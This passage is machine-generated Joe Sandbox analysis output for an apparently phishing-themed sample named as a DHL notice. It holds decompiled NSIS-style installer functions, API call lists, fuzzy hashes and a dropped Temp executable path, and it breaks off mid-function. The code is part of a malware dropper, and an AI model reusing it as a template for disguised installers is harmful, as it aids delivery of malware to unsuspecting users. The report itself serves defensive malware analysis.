                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                            • String ID: "C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t$A$C:\Users\user\AppData\Local\Temp$H7B
                                                            • API String ID: 2624150263-1087676780
                                                            • Opcode ID: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                                            • Instruction ID: 9155a42c54a3203d4d9709c494e168d8d926bd307d67cbb08bf4d9f42020e7e3
                                                            • Opcode Fuzzy Hash: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                                            • Instruction Fuzzy Hash: 94A171F1900219ABDB11EFA5CD41AAFB7B8EF84315F11843BF601B62D1D77C8A418B69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 67%
                                                            			E004021AA() {
                                                            				signed int _t52;
                                                            				void* _t56;
                                                            				intOrPtr* _t60;
                                                            				intOrPtr _t61;
                                                            				intOrPtr* _t62;
                                                            				intOrPtr* _t64;
                                                            				intOrPtr* _t66;
                                                            				intOrPtr* _t68;
                                                            				intOrPtr* _t70;
                                                            				intOrPtr* _t72;
                                                            				intOrPtr* _t74;
                                                            				intOrPtr* _t76;
                                                            				intOrPtr* _t78;
                                                            				intOrPtr* _t80;
                                                            				void* _t83;
                                                            				intOrPtr* _t91;
                                                            				signed int _t101;
                                                            				signed int _t105;
                                                            				void* _t107;
                                                            
                                                            				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
                                                            				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
                                                            				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
                                                            				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
                                                            				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
                                                            				_t52 =  *(_t107 - 0x20);
                                                            				 *(_t107 - 0x50) = _t52 & 0x00000fff;
                                                            				_t101 = _t52 & 0x00008000;
                                                            				_t105 = _t52 >> 0x0000000c & 0x00000007;
                                                            				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
                                                            				if(E00405FAE( *((intOrPtr*)(_t107 - 0x44))) == 0) {
                                                            					E00402DA6(0x21);
                                                            				}
                                                            				_t56 = _t107 + 8;
                                                            				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
                                                            				if(_t56 < _t83) {
                                                            					L14:
                                                            					 *((intOrPtr*)(_t107 - 4)) = 1;
                                                            					_push(0xfffffff0);
                                                            				} else {
                                                            					_t60 =  *((intOrPtr*)(_t107 + 8));
                                                            					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
                                                            					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
                                                            					if(_t61 >= _t83) {
                                                            						_t64 =  *((intOrPtr*)(_t107 + 8));
                                                            						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
                                                            						if(_t101 == _t83) {
                                                            							_t80 =  *((intOrPtr*)(_t107 + 8));
                                                            							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\hardz\\AppData\\Local\\Temp");
                                                            						}
                                                            						if(_t105 != _t83) {
                                                            							_t78 =  *((intOrPtr*)(_t107 + 8));
                                                            							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                                                            						}
                                                            						_t66 =  *((intOrPtr*)(_t107 + 8));
                                                            						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
                                                            						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
                                                            						if( *_t91 != _t83) {
                                                            							_t76 =  *((intOrPtr*)(_t107 + 8));
                                                            							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
                                                            						}
                                                            						_t68 =  *((intOrPtr*)(_t107 + 8));
                                                            						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                                                            						_t70 =  *((intOrPtr*)(_t107 + 8));
                                                            						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                                                            						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                            							_t74 =  *((intOrPtr*)(_t107 - 0x38));
                                                            							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
                                                            						}
                                                            						_t72 =  *((intOrPtr*)(_t107 - 0x38));
                                                            						 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                            					}
                                                            					_t62 =  *((intOrPtr*)(_t107 + 8));
                                                            					 *((intOrPtr*)( *_t62 + 8))(_t62);
                                                            					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                            						_push(0xfffffff4);
                                                            					} else {
                                                            						goto L14;
                                                            					}
                                                            				}
                                                            				E00401423();
                                                            				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t107 - 4));
                                                            				return 0;
                                                            			}























                                                            APIs
                                                            • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                            Strings
                                                            • C:\Users\user\AppData\Local\Temp, xrefs: 00402269
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: CreateInstance
                                                            • String ID: C:\Users\user\AppData\Local\Temp
                                                            • API String ID: 542301482-501415292
                                                            • Opcode ID: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                                                            • Instruction ID: f110e38d5ccd8909b9e85e2ea6b1342c5fae2602ce40754bea02e3b472428d32
                                                            • Opcode Fuzzy Hash: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                                                            • Instruction Fuzzy Hash: BC411771A00209EFCF40DFE4C989E9D7BB5BF49304B20456AF505EB2D1DB799981CB94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 39%
                                                            			E0040290B(short __ebx, short* __edi) {
                                                            				void* _t21;
                                                            
                                                            				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
                                                            					E004065AF( *((intOrPtr*)(_t21 - 0xc)), _t8);
                                                            					_push(_t21 - 0x2b0);
                                                            					_push(__edi);
                                                            					E00406668();
                                                            				} else {
                                                            					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                                                            					 *__edi = __ebx;
                                                            					 *((intOrPtr*)(_t21 - 4)) = 1;
                                                            				}
                                                            				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t21 - 4));
                                                            				return 0;
                                                            			}





                                                            APIs
                                                            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: FileFindFirst
                                                            • String ID:
                                                            • API String ID: 1974802433-0
                                                            • Opcode ID: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                                                            • Instruction ID: b84bdfeecc4e8c0803ac0e71b8711fc90ef1d688bdc4be786e729a17b55638d3
                                                            • Opcode Fuzzy Hash: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                                                            • Instruction Fuzzy Hash: 47F05E71A04105EBDB01DBB4EE49AAEB378EF14314F60457BE101F21D0E7B88E529B29
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 96%
                                                            			E00405031(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                            				struct HWND__* _v8;
                                                            				struct HWND__* _v12;
                                                            				long _v16;
                                                            				signed int _v20;
                                                            				signed int _v24;
                                                            				intOrPtr _v28;
                                                            				signed char* _v32;
                                                            				int _v36;
                                                            				signed int _v44;
                                                            				int _v48;
                                                            				signed int* _v60;
                                                            				signed char* _v64;
                                                            				signed int _v68;
                                                            				long _v72;
                                                            				void* _v76;
                                                            				intOrPtr _v80;
                                                            				intOrPtr _v84;
                                                            				void* _v88;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				signed int _t198;
                                                            				intOrPtr _t201;
                                                            				long _t207;
                                                            				signed int _t211;
                                                            				signed int _t222;
                                                            				void* _t225;
                                                            				void* _t226;
                                                            				int _t232;
                                                            				long _t237;
                                                            				long _t238;
                                                            				signed int _t239;
                                                            				signed int _t245;
                                                            				signed int _t247;
                                                            				signed char _t248;
                                                            				signed char _t254;
                                                            				void* _t258;
                                                            				void* _t260;
                                                            				signed char* _t278;
                                                            				signed char _t279;
                                                            				long _t284;
                                                            				struct HWND__* _t291;
                                                            				signed int* _t292;
                                                            				int _t293;
                                                            				long _t294;
                                                            				signed int _t295;
                                                            				void* _t297;
                                                            				long _t298;
                                                            				int _t299;
                                                            				signed int _t300;
                                                            				signed int _t303;
                                                            				signed int _t311;
                                                            				signed char* _t319;
                                                            				int _t324;
                                                            				void* _t326;
                                                            
                                                            				_t291 = _a4;
                                                            				_v12 = GetDlgItem(_t291, 0x3f9);
                                                            				_v8 = GetDlgItem(_t291, 0x408);
                                                            				_t326 = SendMessageW;
                                                            				_v24 =  *0x42a288;
                                                            				_v28 =  *0x42a270 + 0x94;
                                                            				if(_a8 != 0x110) {
                                                            					L23:
                                                            					if(_a8 != 0x405) {
                                                            						_t301 = _a16;
                                                            					} else {
                                                            						_a12 = 0;
                                                            						_t301 = 1;
                                                            						_a8 = 0x40f;
                                                            						_a16 = 1;
                                                            					}
                                                            					if(_a8 == 0x4e || _a8 == 0x413) {
                                                            						_v16 = _t301;
                                                            						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
                                                            							if(( *0x42a279 & 0x00000002) != 0) {
                                                            								L41:
                                                            								if(_v16 != 0) {
                                                            									_t237 = _v16;
                                                            									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
                                                            										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
                                                            									}
                                                            									_t238 = _v16;
                                                            									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
                                                            										_t301 = _v24;
                                                            										_t239 =  *(_t238 + 0x5c);
                                                            										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
                                                            											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
                                                            										} else {
                                                            											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
                                                            										}
                                                            									}
                                                            								}
                                                            								goto L48;
                                                            							}
                                                            							if(_a8 == 0x413) {
                                                            								L33:
                                                            								_t301 = 0 | _a8 != 0x00000413;
                                                            								_t245 = E00404F7F(_v8, _a8 != 0x413);
                                                            								_t295 = _t245;
                                                            								if(_t295 >= 0) {
                                                            									_t94 = _v24 + 8; // 0x8
                                                            									_t301 = _t245 * 0x818 + _t94;
                                                            									_t247 =  *_t301;
                                                            									if((_t247 & 0x00000010) == 0) {
                                                            										if((_t247 & 0x00000040) == 0) {
                                                            											_t248 = _t247 ^ 0x00000001;
                                                            										} else {
                                                            											_t254 = _t247 ^ 0x00000080;
                                                            											if(_t254 >= 0) {
                                                            												_t248 = _t254 & 0x000000fe;
                                                            											} else {
                                                            												_t248 = _t254 | 0x00000001;
                                                            											}
                                                            										}
                                                            										 *_t301 = _t248;
                                                            										E0040117D(_t295);
                                                            										_a12 = _t295 + 1;
                                                            										_a16 =  !( *0x42a278) >> 0x00000008 & 0x00000001;
                                                            										_a8 = 0x40f;
                                                            									}
                                                            								}
                                                            								goto L41;
                                                            							}
                                                            							_t301 = _a16;
                                                            							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                            								goto L41;
                                                            							}
                                                            							goto L33;
                                                            						} else {
                                                            							goto L48;
                                                            						}
                                                            					} else {
                                                            						L48:
                                                            						if(_a8 != 0x111) {
                                                            							L56:
                                                            							if(_a8 == 0x200) {
                                                            								SendMessageW(_v8, 0x200, 0, 0);
                                                            							}
                                                            							if(_a8 == 0x40b) {
                                                            								_t225 =  *0x42372c;
                                                            								if(_t225 != 0) {
                                                            									ImageList_Destroy(_t225);
                                                            								}
                                                            								_t226 =  *0x423740;
                                                            								if(_t226 != 0) {
                                                            									GlobalFree(_t226);
                                                            								}
                                                            								 *0x42372c = 0;
                                                            								 *0x423740 = 0;
                                                            								 *0x42a2c0 = 0;
                                                            							}
                                                            							if(_a8 != 0x40f) {
                                                            								L90:
                                                            								if(_a8 == 0x420 && ( *0x42a279 & 0x00000001) != 0) {
                                                            									_t324 = (0 | _a16 == 0x00000020) << 3;
                                                            									ShowWindow(_v8, _t324);
                                                            									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
                                                            								}
                                                            								goto L93;
                                                            							} else {
                                                            								E004011EF(_t301, 0, 0);
                                                            								_t198 = _a12;
                                                            								if(_t198 != 0) {
                                                            									if(_t198 != 0xffffffff) {
                                                            										_t198 = _t198 - 1;
                                                            									}
                                                            									_push(_t198);
                                                            									_push(8);
                                                            									E00404FFF();
                                                            								}
                                                            								if(_a16 == 0) {
                                                            									L75:
                                                            									E004011EF(_t301, 0, 0);
                                                            									_v36 =  *0x423740;
                                                            									_t201 =  *0x42a288;
                                                            									_v64 = 0xf030;
                                                            									_v24 = 0;
                                                            									if( *0x42a28c <= 0) {
                                                            										L86:
                                                            										if( *0x42a31e == 0x400) {
                                                            											InvalidateRect(_v8, 0, 1);
                                                            										}
                                                            										if( *((intOrPtr*)( *0x42923c + 0x10)) != 0) {
                                                            											E00404F3A(0x3ff, 0xfffffffb, E00404F52(5));
                                                            										}
                                                            										goto L90;
                                                            									}
                                                            									_t292 = _t201 + 8;
                                                            									do {
                                                            										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
                                                            										if(_t207 != 0) {
                                                            											_t303 =  *_t292;
                                                            											_v72 = _t207;
                                                            											_v76 = 8;
                                                            											if((_t303 & 0x00000001) != 0) {
                                                            												_v76 = 9;
                                                            												_v60 =  &(_t292[4]);
                                                            												_t292[0] = _t292[0] & 0x000000fe;
                                                            											}
                                                            											if((_t303 & 0x00000040) == 0) {
                                                            												_t211 = (_t303 & 0x00000001) + 1;
                                                            												if((_t303 & 0x00000010) != 0) {
                                                            													_t211 = _t211 + 3;
                                                            												}
                                                            											} else {
                                                            												_t211 = 3;
                                                            											}
                                                            											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
                                                            											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
                                                            											SendMessageW(_v8, 0x113f, 0,  &_v76);
                                                            										}
                                                            										_v24 = _v24 + 1;
                                                            										_t292 =  &(_t292[0x206]);
                                                            									} while (_v24 <  *0x42a28c);
                                                            									goto L86;
                                                            								} else {
                                                            									_t293 = E004012E2( *0x423740);
                                                            									E00401299(_t293);
                                                            									_t222 = 0;
                                                            									_t301 = 0;
                                                            									if(_t293 <= 0) {
                                                            										L74:
                                                            										SendMessageW(_v12, 0x14e, _t301, 0);
                                                            										_a16 = _t293;
                                                            										_a8 = 0x420;
                                                            										goto L75;
                                                            									} else {
                                                            										goto L71;
                                                            									}
                                                            									do {
                                                            										L71:
                                                            										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
                                                            											_t301 = _t301 + 1;
                                                            										}
                                                            										_t222 = _t222 + 1;
                                                            									} while (_t222 < _t293);
                                                            									goto L74;
                                                            								}
                                                            							}
                                                            						}
                                                            						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                            							goto L93;
                                                            						} else {
                                                            							_t232 = SendMessageW(_v12, 0x147, 0, 0);
                                                            							if(_t232 == 0xffffffff) {
                                                            								goto L93;
                                                            							}
                                                            							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
                                                            							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
                                                            								_t294 = 0x20;
                                                            							}
                                                            							E00401299(_t294);
                                                            							SendMessageW(_a4, 0x420, 0, _t294);
                                                            							_a12 = _a12 | 0xffffffff;
                                                            							_a16 = 0;
                                                            							_a8 = 0x40f;
                                                            							goto L56;
                                                            						}
                                                            					}
                                                            				} else {
                                                            					_v36 = 0;
                                                            					_v20 = 2;
                                                            					 *0x42a2c0 = _t291;
                                                            					 *0x423740 = GlobalAlloc(0x40,  *0x42a28c << 2);
                                                            					_t258 = LoadImageW( *0x42a260, 0x6e, 0, 0, 0, 0);
                                                            					 *0x423734 =  *0x423734 | 0xffffffff;
                                                            					_t297 = _t258;
                                                            					 *0x42373c = SetWindowLongW(_v8, 0xfffffffc, E0040563E);
                                                            					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                            					 *0x42372c = _t260;
                                                            					ImageList_AddMasked(_t260, _t297, 0xff00ff);
                                                            					SendMessageW(_v8, 0x1109, 2,  *0x42372c);
                                                            					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                                                            						SendMessageW(_v8, 0x111b, 0x10, 0);
                                                            					}
                                                            					DeleteObject(_t297);
                                                            					_t298 = 0;
                                                            					do {
                                                            						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
                                                            						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
                                                            							if(_t298 != 0x20) {
                                                            								_v20 = 0;
                                                            							}
                                                            							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066A5(_t298, 0, _t326, 0, _t266)), _t298);
                                                            						}
                                                            						_t298 = _t298 + 1;
                                                            					} while (_t298 < 0x21);
                                                            					_t299 = _a16;
                                                            					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
                                                            					_push(0x15);
                                                            					E004045C4(_a4);
                                                            					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
                                                            					_push(0x16);
                                                            					E004045C4(_a4);
                                                            					_t300 = 0;
                                                            					_v16 = 0;
                                                            					if( *0x42a28c <= 0) {
                                                            						L19:
                                                            						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                                                            						goto L20;
                                                            					} else {
                                                            						_t319 = _v24 + 8;
                                                            						_v32 = _t319;
                                                            						do {
                                                            							_t278 =  &(_t319[0x10]);
                                                            							if( *_t278 != 0) {
                                                            								_v64 = _t278;
                                                            								_t279 =  *_t319;
                                                            								_v88 = _v16;
                                                            								_t311 = 0x20;
                                                            								_v84 = 0xffff0002;
                                                            								_v80 = 0xd;
                                                            								_v68 = _t311;
                                                            								_v44 = _t300;
                                                            								_v72 = _t279 & _t311;
                                                            								if((_t279 & 0x00000002) == 0) {
                                                            									if((_t279 & 0x00000004) == 0) {
                                                            										 *( *0x423740 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                            									} else {
                                                            										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
                                                            									}
                                                            								} else {
                                                            									_v80 = 0x4d;
                                                            									_v48 = 1;
                                                            									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                            									_v36 = 1;
                                                            									 *( *0x423740 + _t300 * 4) = _t284;
                                                            									_v16 =  *( *0x423740 + _t300 * 4);
                                                            								}
                                                            							}
                                                            							_t300 = _t300 + 1;
                                                            							_t319 =  &(_v32[0x818]);
                                                            							_v32 = _t319;
                                                            						} while (_t300 <  *0x42a28c);
                                                            						if(_v36 != 0) {
                                                            							L20:
                                                            							if(_v20 != 0) {
                                                            								E004045F9(_v8);
                                                            								goto L23;
                                                            							} else {
                                                            								ShowWindow(_v12, 5);
                                                            								E004045F9(_v12);
                                                            								L93:
                                                            								return E0040462B(_a8, _a12, _a16);
                                                            							}
                                                            						}
                                                            						goto L19;
                                                            					}
                                                            				}
                                                            			}

                                                            APIs
                                                            • GetDlgItem.USER32 ref: 00405049
                                                            • GetDlgItem.USER32 ref: 00405054
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
                                                            • LoadImageW.USER32 ref: 004050B5
                                                            • SetWindowLongW.USER32 ref: 004050CE
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E2
                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405128
                                                            • DeleteObject.GDI32(00000000), ref: 0040512B
                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
                                                            • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D
                                                              • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0040526F
                                                            • SetWindowLongW.USER32 ref: 0040527D
                                                            • ShowWindow.USER32(?,00000005), ref: 0040528D
                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
                                                            • ImageList_Destroy.COMCTL32(?), ref: 0040545B
                                                            • GlobalFree.KERNEL32 ref: 0040546B
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004055C7
                                                            • ShowWindow.USER32(?,00000000), ref: 00405615
                                                            • GetDlgItem.USER32 ref: 00405620
                                                            • ShowWindow.USER32(00000000), ref: 00405627
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                            • String ID: $M$N
                                                            • API String ID: 2564846305-813528018
                                                            • Opcode ID: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                                            • Instruction ID: a1eb65f7683e17450fca8d4cb4c1055b074660be5b1b810df034ff690b7f681c
                                                            • Opcode Fuzzy Hash: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                                            • Instruction Fuzzy Hash: 2A025CB0900609EFDF20DF65CD45AAE7BB5FB44315F10817AEA10BA2E1D7798A52CF18
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 91%
                                                            			E00404783(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                                                            				intOrPtr _v8;
                                                            				int _v12;
                                                            				void* _v16;
                                                            				struct HWND__* _t56;
                                                            				signed int _t75;
                                                            				signed short* _t76;
                                                            				signed short* _t78;
                                                            				long _t92;
                                                            				int _t103;
                                                            				signed int _t110;
                                                            				intOrPtr _t113;
                                                            				WCHAR* _t114;
                                                            				signed int* _t116;
                                                            				WCHAR* _t117;
                                                            				struct HWND__* _t118;
                                                            
                                                            				if(_a8 != 0x110) {
                                                            					if(_a8 != 0x111) {
                                                            						L13:
                                                            						if(_a8 != 0x4e) {
                                                            							if(_a8 == 0x40b) {
                                                            								 *0x421714 =  *0x421714 + 1;
                                                            							}
                                                            							L27:
                                                            							_t114 = _a16;
                                                            							L28:
                                                            							return E0040462B(_a8, _a12, _t114);
                                                            						}
                                                            						_t56 = GetDlgItem(_a4, 0x3e8);
                                                            						_t114 = _a16;
                                                            						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                                                            							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                                                            							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                                                            							_v12 = _t103;
                                                            							_v16 = _t113;
                                                            							_v8 = 0x428200;
                                                            							if(_t103 - _t113 < 0x800) {
                                                            								SendMessageW(_t56, 0x44b, 0,  &_v16);
                                                            								SetCursor(LoadCursorW(0, 0x7f02));
                                                            								_push(1);
                                                            								E00404A32(_a4, _v8);
                                                            								SetCursor(LoadCursorW(0, 0x7f00));
                                                            								_t114 = _a16;
                                                            							}
                                                            						}
                                                            						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                                                            							goto L28;
                                                            						} else {
                                                            							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                                                            								SendMessageW( *0x42a268, 0x111, 1, 0);
                                                            							}
                                                            							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                                                            								SendMessageW( *0x42a268, 0x10, 0, 0);
                                                            							}
                                                            							return 1;
                                                            						}
                                                            					}
                                                            					if(_a12 >> 0x10 != 0 ||  *0x421714 != 0) {
                                                            						goto L27;
                                                            					} else {
                                                            						_t116 =  *0x422720 + 0x14;
                                                            						if(( *_t116 & 0x00000020) == 0) {
                                                            							goto L27;
                                                            						}
                                                            						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                            						E004045E6(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                            						E00404A0E();
                                                            						goto L13;
                                                            					}
                                                            				}
                                                            				_t117 = _a16;
                                                            				_t75 =  *(_t117 + 0x30);
                                                            				if(_t75 < 0) {
                                                            					_t75 =  *( *0x42923c - 4 + _t75 * 4);
                                                            				}
                                                            				_t76 =  *0x42a298 + _t75 * 2;
                                                            				_t110 =  *_t76 & 0x0000ffff;
                                                            				_a8 = _t110;
                                                            				_t78 =  &(_t76[1]);
                                                            				_a16 = _t78;
